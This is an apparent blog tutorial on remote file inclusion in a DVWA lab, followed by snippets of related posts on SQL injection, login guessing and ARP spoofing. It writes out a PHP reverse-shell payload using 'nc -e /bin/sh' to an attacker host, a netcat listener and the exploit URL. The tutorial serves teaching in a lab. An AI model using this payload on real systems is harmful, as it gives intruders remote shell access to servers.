Ethical Hacking - Web Penetration Testing(6)

REMOTE FILE INCLUSION

Similar to local file inclusion.
But allows an attacker to read ANY file from ANY server.
Execute PHP files from other servers on the current server.
Store PHP files on other servers as .txt.

Pre-Condition:

Set allow_url_include to On status.

Restart web service

Create a local php file on /var/www/html.

<?php
passthru("nc -e /bin/sh 10.0.0.13 8080");
?>

Execute the NC command to wait for connection.

nc -vv -l -p 8080

Visit the URL(http://10.0.0.24/dvwa/vulnerabilities/fi/?page=http://10.0.0.13/reverse.txt?) to execute the reverse connection commands.

We connect to the target machine successfully.

原文地址：https://www.cnblogs.com/keepmoving1113/p/12274844.html

时间： 2024-10-22 22:18:24

Ethical Hacking - Web Penetration Testing(6)的相关文章

Ethical Hacking - Web Penetration Testing(13)

OWASP ZAP(ZED ATTACK PROXY) Automatically find vulnerabilities in web applications. Free and easy to use. It can also be used for manual testing. This is the welcome page. Options Page Scan Policy Setting Page. Attack this target URL http://10.0.0.24

Python Ethical Hacking - WEB PENETRATION TESTING(3)

CRAWLING SUMMARY Our crawler so far can guess: Subdomains. Directories. Files. Advantages: ->Discover "hidden" paths/paths admin does not want us to know. Disadvantages: -> Will does not discover everything. Solution: -> Analyse discove

Python Ethical Hacking - WEB PENETRATION TESTING(5)

Guessing Login Information on Login Pages Our target website: http://10.0.0.45/dvwa/login.php #!/usr/bin/env python import requests target_url = "http://10.0.0.45/dvwa/login.php" data_dict = {"username": "dfdfddfd", "pas

Ethical Hacking - Web Penetration Testing(9)

SQL INJECTION Discovering SQLi in GET Inject by browser URL. Selecting Data From Database Change the number to a big one, then you can get a useful error message. And you can try different number to find the right column. Using “union select 1,2,3,4,

Ethical Hacking - NETWORK PENETRATION TESTING(15)

ARP Poisoning - arpspoof Arpspoof is a tool part of a suit called dsniff, which contains a number of network penetration tools. Arpspoof can be used to launch a MITM attack and redirect traffic to flow through our device. 1. Tell the target client th

Ethical Hacking - NETWORK PENETRATION TESTING(2)

ALFA AWUS 1900 https://www.alfa.com.tw/products_detail/2.htm Run the following shell command on Kali Linux and reboot. (Refer to https://forums.kali.org/showthread.php?36296-EXTREME-WIFI-SUPPORT-Alfa-Networks-AWUS1900-WORKING) apt-get install realt

Ethical Hacking - NETWORK PENETRATION TESTING(3)

Change MAC Address using macchanger. Packet Sniffing Basics Airodump-ng airodump-ng is a program part of the aircrack-ng package, it's a packet sniffer that allows us to capture all the packets that are in our wifi card range. We can also use it to

Ethical Hacking - NETWORK PENETRATION TESTING(5)

Deauthentication Attacks Theory This attack is used to disconnect any device from any network within our range even if the network is protected with a key. Hacker sends de-authentication packets to the router pretending to be the target matching(by s

Ethical Hacking - NETWORK PENETRATION TESTING(4)

Targeted packet sniffing airodump-ng --channel[channel] --bssid[bssid] --write[file-name][interface] Now all the data will be stored in the file name specified after the -write option. We can analyze this data using Wireshark. The only problem is tha